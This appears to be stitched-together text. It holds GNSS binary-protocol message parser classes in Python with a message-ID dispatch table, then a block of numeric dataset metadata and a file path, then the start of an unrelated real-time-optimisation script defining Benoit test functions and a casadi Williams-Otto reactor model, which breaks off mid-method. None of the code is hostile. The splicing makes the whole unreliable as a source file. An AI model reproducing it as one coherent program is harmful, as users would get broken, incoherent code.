    # (field, reader) pairs in wire order.
    for field, read in (('tow', get_u32),
                        ('lat', get_f64),
                        ('lon', get_f64),
                        ('height', get_f64),
                        ('h_accuracy', get_u16),
                        ('v_accuracy', get_u16),
                        ('n_sats', get_u8),
                        ('flags', get_u8)):
      (value, offset, length) = read(buf, offset, length)
      decoded[field] = value
    return decoded, offset, length

  def _unpack_members(self, buf, offset, length):
    """Parse buf and assign each decoded field onto self."""
    res, off, length = self.parse_members(buf, offset, length)
    if off == offset:
      # No bytes consumed: report an empty result and leave self unchanged.
      return {}, offset, length
    for field, value in res.items():
      setattr(self, field, value)
    return res, off, length
SBP_MSG_POS_LLH_COV_GNSS = 0x0231
class MsgPosLLHCovGnss(SBP):
    """SBP class for message MSG_POS_LLH_COV_GNSS (0x0231).

    Absolute geodetic position plus the upper triangle of the 3x3
    covariance matrix expressed in the local North/East/Down frame.
    Covariances are reported against the "downward" measurement, so mind
    the sign convention. Position info and Fix Mode flags follow the
    MSG_POS_LLH message.
    """
    __slots__ = ['tow', 'lat', 'lon', 'height', 'cov_n_n', 'cov_n_e',
                 'cov_n_d', 'cov_e_e', 'cov_e_d', 'cov_d_d', 'n_sats',
                 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['lat'], offset, length) = get_f64(buf, offset, length)
        (members['lon'], offset, length) = get_f64(buf, offset, length)
        (members['height'], offset, length) = get_f64(buf, offset, length)
        # Covariance terms are optionally rounded to float32 precision.
        for key in ('cov_n_n', 'cov_n_e', 'cov_n_d',
                    'cov_e_e', 'cov_e_d', 'cov_d_d'):
            (val, offset, length) = get_f32(buf, offset, length)
            members[key] = judicious_round(np.float32(val)) if SBP.judicious_rounding else val
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_ECEF_GNSS = 0x022D
class MsgVelECEFGnss(SBP):
    """SBP class for message MSG_VEL_ECEF_GNSS (0x022D).

    Velocity in Earth Centered Earth Fixed (ECEF) coordinates. The full
    GPS time is given by the preceding MSG_GPS_TIME with the matching
    time-of-week (tow).
    """
    __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['x'], offset, length) = get_s32(buf, offset, length)
        (members['y'], offset, length) = get_s32(buf, offset, length)
        (members['z'], offset, length) = get_s32(buf, offset, length)
        (members['accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_ECEF_COV_GNSS = 0x0235
class MsgVelECEFCovGnss(SBP):
    """SBP class for message MSG_VEL_ECEF_COV_GNSS (0x0235).

    Velocity in Earth Centered Earth Fixed (ECEF) coordinates together
    with the upper triangle of the 3x3 covariance matrix. The full GPS
    time is given by the preceding MSG_GPS_TIME with the matching tow.
    """
    __slots__ = ['tow', 'x', 'y', 'z', 'cov_x_x', 'cov_x_y', 'cov_x_z',
                 'cov_y_y', 'cov_y_z', 'cov_z_z', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['x'], offset, length) = get_s32(buf, offset, length)
        (members['y'], offset, length) = get_s32(buf, offset, length)
        (members['z'], offset, length) = get_s32(buf, offset, length)
        # Covariance terms are optionally rounded to float32 precision.
        for key in ('cov_x_x', 'cov_x_y', 'cov_x_z',
                    'cov_y_y', 'cov_y_z', 'cov_z_z'):
            (val, offset, length) = get_f32(buf, offset, length)
            members[key] = judicious_round(np.float32(val)) if SBP.judicious_rounding else val
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_NED_GNSS = 0x022E
class MsgVelNEDGnss(SBP):
    """SBP class for message MSG_VEL_NED_GNSS (0x022E).

    Velocity in local North East Down (NED) coordinates; the NED frame
    is the local WGS84 tangent plane centered at the current position.
    The full GPS time is given by the preceding MSG_GPS_TIME with the
    matching time-of-week (tow).
    """
    __slots__ = ['tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy',
                 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['n'], offset, length) = get_s32(buf, offset, length)
        (members['e'], offset, length) = get_s32(buf, offset, length)
        (members['d'], offset, length) = get_s32(buf, offset, length)
        (members['h_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['v_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_NED_COV_GNSS = 0x0232
class MsgVelNEDCovGnss(SBP):
    """SBP class for message MSG_VEL_NED_COV_GNSS (0x0232).

    Velocity in local North East Down (NED) coordinates, like
    MSG_VEL_NED but with the upper triangular portion of the 3x3
    covariance matrix. The NED frame is the local WGS84 tangent plane
    centered at the current position; full GPS time comes from the
    preceding MSG_GPS_TIME with the matching tow.
    """
    __slots__ = ['tow', 'n', 'e', 'd', 'cov_n_n', 'cov_n_e', 'cov_n_d',
                 'cov_e_e', 'cov_e_d', 'cov_d_d', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['n'], offset, length) = get_s32(buf, offset, length)
        (members['e'], offset, length) = get_s32(buf, offset, length)
        (members['d'], offset, length) = get_s32(buf, offset, length)
        # Covariance terms are optionally rounded to float32 precision.
        for key in ('cov_n_n', 'cov_n_e', 'cov_n_d',
                    'cov_e_e', 'cov_e_d', 'cov_d_d'):
            (val, offset, length) = get_f32(buf, offset, length)
            members[key] = judicious_round(np.float32(val)) if SBP.judicious_rounding else val
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_BODY = 0x0213
class MsgVelBody(SBP):
    """SBP class for message MSG_VEL_BODY (0x0213).

    Velocity in the Vehicle Body Frame: x points out the nose (forward),
    y out the right-hand side, and z (right-handed) out the bottom of
    the vehicle. The frame's orientation and origin are set via device
    settings. Full GPS time comes from the preceding MSG_GPS_TIME with
    the matching tow. Only produced by inertial versions of Swift
    products; not available from Piksi Multi or Duro.
    """
    __slots__ = ['tow', 'x', 'y', 'z', 'cov_x_x', 'cov_x_y', 'cov_x_z',
                 'cov_y_y', 'cov_y_z', 'cov_z_z', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['x'], offset, length) = get_s32(buf, offset, length)
        (members['y'], offset, length) = get_s32(buf, offset, length)
        (members['z'], offset, length) = get_s32(buf, offset, length)
        # Covariance terms are optionally rounded to float32 precision.
        for key in ('cov_x_x', 'cov_x_y', 'cov_x_z',
                    'cov_y_y', 'cov_y_z', 'cov_z_z'):
            (val, offset, length) = get_f32(buf, offset, length)
            members[key] = judicious_round(np.float32(val)) if SBP.judicious_rounding else val
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_AGE_CORRECTIONS = 0x0210
class MsgAgeCorrections(SBP):
    """SBP class for message MSG_AGE_CORRECTIONS (0x0210).

    Reports the age of the corrections used for the current differential
    solution.
    """
    __slots__ = ['tow', 'age']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['age'], offset, length) = get_u16(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_GPS_TIME_DEP_A = 0x0100
class MsgGPSTimeDepA(SBP):
    """SBP class for message MSG_GPS_TIME_DEP_A (0x0100).

    GPS time since the GPS epoch (midnight January 6, 1980 UTC),
    expressed as week number plus time of week (0..604800 s). GPS time
    does not accumulate leap seconds and currently has a small offset
    from UTC. In a stream this message precedes a set of navigation
    messages referenced to the same time (which lack the ns field) and
    gives them a more precise timestamp.
    """
    __slots__ = ['wn', 'tow', 'ns_residual', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['wn'], offset, length) = get_u16(buf, offset, length)
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['ns_residual'], offset, length) = get_s32(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_DOPS_DEP_A = 0x0206
class MsgDopsDepA(SBP):
    """SBP class for message MSG_DOPS_DEP_A (0x0206).

    Dilution of precision (DOP) values describing the effect of
    navigation satellite geometry on positional measurement precision.
    """
    __slots__ = ['tow', 'gdop', 'pdop', 'tdop', 'hdop', 'vdop']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        for key in ('gdop', 'pdop', 'tdop', 'hdop', 'vdop'):
            (members[key], offset, length) = get_u16(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_POS_ECEF_DEP_A = 0x0200
class MsgPosECEFDepA(SBP):
    """SBP class for message MSG_POS_ECEF_DEP_A (0x0200).

    Absolute Earth Centered Earth Fixed (ECEF) position solution and its
    status (single point vs pseudo-absolute RTK). With a surveyed base
    position and an RTK fix the solution is pseudo-absolute. The full
    GPS time is given by the preceding MSG_GPS_TIME with the matching
    time-of-week (tow).
    """
    __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['x'], offset, length) = get_f64(buf, offset, length)
        (members['y'], offset, length) = get_f64(buf, offset, length)
        (members['z'], offset, length) = get_f64(buf, offset, length)
        (members['accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_POS_LLH_DEP_A = 0x0201
class MsgPosLLHDepA(SBP):
    """SBP class for message MSG_POS_LLH_DEP_A (0x0201).

    Absolute geodetic position solution (lat/lon/height) and its status
    (single point vs pseudo-absolute RTK). With a surveyed base position
    and an RTK fix the solution is pseudo-absolute. The full GPS time is
    given by the preceding MSG_GPS_TIME with the matching tow.
    """
    __slots__ = ['tow', 'lat', 'lon', 'height', 'h_accuracy', 'v_accuracy',
                 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['lat'], offset, length) = get_f64(buf, offset, length)
        (members['lon'], offset, length) = get_f64(buf, offset, length)
        (members['height'], offset, length) = get_f64(buf, offset, length)
        (members['h_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['v_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_BASELINE_ECEF_DEP_A = 0x0202
class MsgBaselineECEFDepA(SBP):
    """SBP class for message MSG_BASELINE_ECEF_DEP_A (0x0202).

    Baseline solution in Earth Centered Earth Fixed (ECEF) coordinates:
    the relative vector distance from the base station to the rover
    receiver. The full GPS time is given by the preceding MSG_GPS_TIME
    with the matching time-of-week (tow).
    """
    __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['x'], offset, length) = get_s32(buf, offset, length)
        (members['y'], offset, length) = get_s32(buf, offset, length)
        (members['z'], offset, length) = get_s32(buf, offset, length)
        (members['accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_BASELINE_NED_DEP_A = 0x0203
class MsgBaselineNEDDepA(SBP):
    """SBP class for message MSG_BASELINE_NED_DEP_A (0x0203).

    Baseline solution in North East Down (NED) coordinates: the relative
    vector distance from the base station to the rover receiver, with
    the NED frame defined at the local WGS84 tangent plane centered at
    the base station position. Full GPS time comes from the preceding
    MSG_GPS_TIME with the matching tow.
    """
    __slots__ = ['tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy',
                 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['n'], offset, length) = get_s32(buf, offset, length)
        (members['e'], offset, length) = get_s32(buf, offset, length)
        (members['d'], offset, length) = get_s32(buf, offset, length)
        (members['h_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['v_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_ECEF_DEP_A = 0x0204
class MsgVelECEFDepA(SBP):
    """SBP class for message MSG_VEL_ECEF_DEP_A (0x0204).

    Velocity in Earth Centered Earth Fixed (ECEF) coordinates. The full
    GPS time is given by the preceding MSG_GPS_TIME with the matching
    time-of-week (tow).
    """
    __slots__ = ['tow', 'x', 'y', 'z', 'accuracy', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['x'], offset, length) = get_s32(buf, offset, length)
        (members['y'], offset, length) = get_s32(buf, offset, length)
        (members['z'], offset, length) = get_s32(buf, offset, length)
        (members['accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_VEL_NED_DEP_A = 0x0205
class MsgVelNEDDepA(SBP):
    """SBP class for message MSG_VEL_NED_DEP_A (0x0205).

    Velocity in local North East Down (NED) coordinates; the NED frame
    is the local WGS84 tangent plane centered at the current position.
    The full GPS time is given by the preceding MSG_GPS_TIME with the
    matching time-of-week (tow).
    """
    __slots__ = ['tow', 'n', 'e', 'd', 'h_accuracy', 'v_accuracy',
                 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['n'], offset, length) = get_s32(buf, offset, length)
        (members['e'], offset, length) = get_s32(buf, offset, length)
        (members['d'], offset, length) = get_s32(buf, offset, length)
        (members['h_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['v_accuracy'], offset, length) = get_u16(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_BASELINE_HEADING_DEP_A = 0x0207
class MsgBaselineHeadingDepA(SBP):
    """SBP class for message MSG_BASELINE_HEADING_DEP_A (0x0207).

    Baseline heading pointing from the base station to the rover,
    relative to True North. The full GPS time is given by the preceding
    MSG_GPS_TIME with the matching time-of-week (tow).
    """
    __slots__ = ['tow', 'heading', 'n_sats', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['heading'], offset, length) = get_u32(buf, offset, length)
        (members['n_sats'], offset, length) = get_u8(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
SBP_MSG_PROTECTION_LEVEL = 0x0216
class MsgProtectionLevel(SBP):
    """SBP class for message MSG_PROTECTION_LEVEL (0x0216).

    Local vertical and horizontal protection levels associated with a
    given LLH position solution. The full GPS time is given by the
    preceding MSG_GPS_TIME with the matching time-of-week (tow).
    """
    __slots__ = ['tow', 'vpl', 'hpl', 'lat', 'lon', 'height', 'flags']

    @classmethod
    def parse_members(cls, buf, offset, length):
        """Decode the wire fields in order; each get_* advances offset."""
        members = {}
        (members['tow'], offset, length) = get_u32(buf, offset, length)
        (members['vpl'], offset, length) = get_u16(buf, offset, length)
        (members['hpl'], offset, length) = get_u16(buf, offset, length)
        (members['lat'], offset, length) = get_f64(buf, offset, length)
        (members['lon'], offset, length) = get_f64(buf, offset, length)
        (members['height'], offset, length) = get_f64(buf, offset, length)
        (members['flags'], offset, length) = get_u8(buf, offset, length)
        return members, offset, length

    def _unpack_members(self, buf, offset, length):
        """Parse the payload and copy each field onto this instance."""
        members, new_offset, length = self.parse_members(buf, offset, length)
        if new_offset == offset:
            # Nothing consumed: not enough bytes for the message body.
            return {}, offset, length
        for name in self.__slots__:
            setattr(self, name, members[name])
        return members, new_offset, length
# Dispatch table: SBP message ID -> message class, used to decode an
# incoming frame by its msg_type.
msg_classes = {
  0x0102: MsgGPSTime,
  0x0104: MsgGPSTimeGnss,
  0x0103: MsgUtcTime,
  0x0105: MsgUtcTimeGnss,
  0x0208: MsgDops,
  0x0209: MsgPosECEF,
  0x0214: MsgPosECEFCov,
  0x020A: MsgPosLLH,
  0x0211: MsgPosLLHCov,
  0x020B: MsgBaselineECEF,
  0x020C: MsgBaselineNED,
  0x020D: MsgVelECEF,
  0x0215: MsgVelECEFCov,
  0x020E: MsgVelNED,
  0x0212: MsgVelNEDCov,
  0x0229: MsgPosECEFGnss,
  0x0234: MsgPosECEFCovGnss,
  0x022A: MsgPosLLHGnss,
  0x0231: MsgPosLLHCovGnss,
  0x022D: MsgVelECEFGnss,
  0x0235: MsgVelECEFCovGnss,
  0x022E: MsgVelNEDGnss,
  0x0232: MsgVelNEDCovGnss,
  0x0213: MsgVelBody,
  0x0210: MsgAgeCorrections,
  0x0100: MsgGPSTimeDepA,
  0x0206: MsgDopsDepA,
  0x0200: MsgPosECEFDepA,
  0x0201: MsgPosLLHDepA,
  0x0202: MsgBaselineECEFDepA,
  0x0203: MsgBaselineNEDDepA,
  0x0204: MsgVelECEFDepA,
  0x0205: MsgVelNEDDepA,
  0x0207: MsgBaselineHeadingDepA,
  0x0216: MsgProtectionLevel,
}
| 34.692341
| 100
| 0.646868
| 11,655
| 80,174
| 4.160875
| 0.039468
| 0.183854
| 0.120322
| 0.118404
| 0.918301
| 0.90962
| 0.893453
| 0.886298
| 0.867306
| 0.86178
| 0
| 0.019986
| 0.237384
| 80,174
| 2,311
| 101
| 34.692341
| 0.773167
| 0.272308
| 0
| 0.896315
| 0
| 0
| 0.068154
| 0
| 0
| 0
| 0.007223
| 0
| 0
| 1
| 0.043723
| false
| 0
| 0.004997
| 0
| 0.158026
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c7abc76f116a8695796758b508891e9d071017b6
| 21,518
|
py
|
Python
|
case_studies/RTO/systems.py
|
OptiMaL-PSE-Lab/Expensive-Black-Box-Optim-ChemEng
|
19c34dcff8c983926df501b93152fa3b3b0305d6
|
[
"MIT"
] | null | null | null |
case_studies/RTO/systems.py
|
OptiMaL-PSE-Lab/Expensive-Black-Box-Optim-ChemEng
|
19c34dcff8c983926df501b93152fa3b3b0305d6
|
[
"MIT"
] | null | null | null |
case_studies/RTO/systems.py
|
OptiMaL-PSE-Lab/Expensive-Black-Box-Optim-ChemEng
|
19c34dcff8c983926df501b93152fa3b3b0305d6
|
[
"MIT"
] | null | null | null |
# v2 includes shaping the TR with the curvature of the problem by a broyden update on derivatives
# and a BFGS update on the Hessian, however the TR becomes very small in some parts, so the approach
# does not seem to be too effective.
import time
import random
import numpy as np
import numpy.random as rnd
from scipy.spatial.distance import cdist
# import sobol_seq
from scipy.optimize import minimize
from scipy.optimize import broyden1
from scipy import linalg
import scipy
import matplotlib.pyplot as plt
import functools
from matplotlib.patches import Ellipse
from casadi import *
def Benoit_Model(u):
    """Noise-free Benoit model objective: u[0]**2 + u[1]**2."""
    return u[0] ** 2 + u[1] ** 2
def con1_model(u):
    """Benoit model constraint: returns the negated value of
    g1 = 1 - u[0] + u[1]**2."""
    g_value = 1. - u[0] + u[1] ** 2
    return -g_value
def Benoit_System(u):
    """Benoit 'plant' objective: u0^2 + u1^2 + u0*u1 plus one draw of
    Gaussian measurement noise (std = sqrt(1e-3))."""
    noise = np.random.normal(0., np.sqrt(1e-3))
    return u[0] ** 2 + u[1] ** 2 + u[0] * u[1] + noise
def con1_system(u):
    """Noisy plant constraint: returns
    -(1 - u[0] + u[1]**2 + 2*u[1] - 2 + noise), noise ~ N(0, 1e-3)."""
    noise = np.random.normal(0., np.sqrt(1e-3))
    return -(1. - u[0] + u[1] ** 2 + 2. * u[1] - 2. + noise)
def con1_system_tight(u):
    """Tightened noisy plant constraint (no '-2' relaxation term):
    returns -(1 - u[0] + u[1]**2 + 2*u[1] + noise), noise ~ N(0, 1e-3)."""
    noise = np.random.normal(0., np.sqrt(1e-3))
    return -(1. - u[0] + u[1] ** 2 + 2. * u[1] + noise)
def Benoit_System_noiseless(u):
    """Deterministic variant of Benoit_System: u0^2 + u1^2 + u0*u1."""
    quadratic = u[0] ** 2 + u[1] ** 2
    cross = u[0] * u[1]
    return quadratic + cross
def con1_system_noiseless(u):
    """Deterministic variant of con1_system:
    returns -(1 - u[0] + u[1]**2 + 2*u[1] - 2)."""
    g_value = 1. - u[0] + u[1] ** 2 + 2. * u[1] - 2.
    return -g_value
def con1_system_tight_noiseless(u):
    """Deterministic variant of con1_system_tight:
    returns -(1 - u[0] + u[1]**2 + 2*u[1])."""
    g_value = 1. - u[0] + u[1] ** 2 + 2. * u[1]
    return -g_value
class WO_system:
    """Williams-Otto CSTR 'plant' (three-reaction kinetics), solved at steady
    state with a casadi Newton rootfinder.  Provides noisy and noiseless
    objective/constraint evaluations for the input u = [Fb, Tr].
    """
    # Parameters
    # NOTE(review): method bodies resolve Fa/Mt/phi1/... to the module-level
    # globals of the same names (class attributes are not in method scope).
    Fa = 1.8275        # feed rate of reactant A (units not stated here -- TODO confirm)
    Mt = 2105.2        # mass/holdup term scaling the reaction rates
    # kinetic parameters
    phi1 = - 3.
    psi1 = -17.
    phi2 = - 4.
    psi2 = -29.
    # Reference temperature
    Tref = 110. + 273.15  # [=] K.

    def __init__(self):
        # Build the symbolic DAE once; self.eval is the Newton rootfinder
        # mapping (initial guess, u) -> steady-state algebraic states.
        self.xd, self.xa, self.u, self.ODEeq, self.Aeq, self.states, self.algebraics, self.inputs = self.DAE_system()
        self.eval = self.integrator_system()

    def DAE_system(self):
        """Create the casadi symbols and algebraic residual equations.

        NOTE: state/algebraic/input symbols are injected into globals() by
        name ('x', 'Xa'..'Xg', 'Fb', 'Tr') so the expressions below can use
        them directly; this mutates module globals as a side effect.
        """
        # Define vectors with names of states
        states = ['x']
        nd = len(states)
        xd = SX.sym('xd', nd)
        for i in range(nd):
            globals()[states[i]] = xd[i]
        # Define vectors with names of algebraic variables
        algebraics = ['Xa', 'Xb', 'Xc', 'Xe', 'Xp', 'Xg']
        na = len(algebraics)
        xa = SX.sym('xa', na)
        for i in range(na):
            globals()[algebraics[i]] = xa[i]
        inputs = ['Fb', 'Tr']
        nu = len(inputs)
        u = SX.sym("u", nu)
        for i in range(nu):
            globals()[inputs[i]] = u[i]
        # Reparametrization: Arrhenius-type rate constants (Tr in deg C)
        k1 = 1.6599e6 * np.exp(-6666.7 / (Tr + 273.15))
        k2 = 7.2117e8 * np.exp(-8333.3 / (Tr + 273.15))
        k3 = 2.6745e12 * np.exp(-11111. / (Tr + 273.15))
        # reaction rate
        Fr = Fa + Fb
        r1 = k1 * Xa * Xb * Mt
        r2 = k2 * Xb * Xc * Mt
        r3 = k3 * Xc * Xp * Mt
        # residual for x -- computed but never used here; Aeq below repeats
        # the same balances symbolically.
        # NOTE(review): assigning symbolic SX expressions into a float numpy
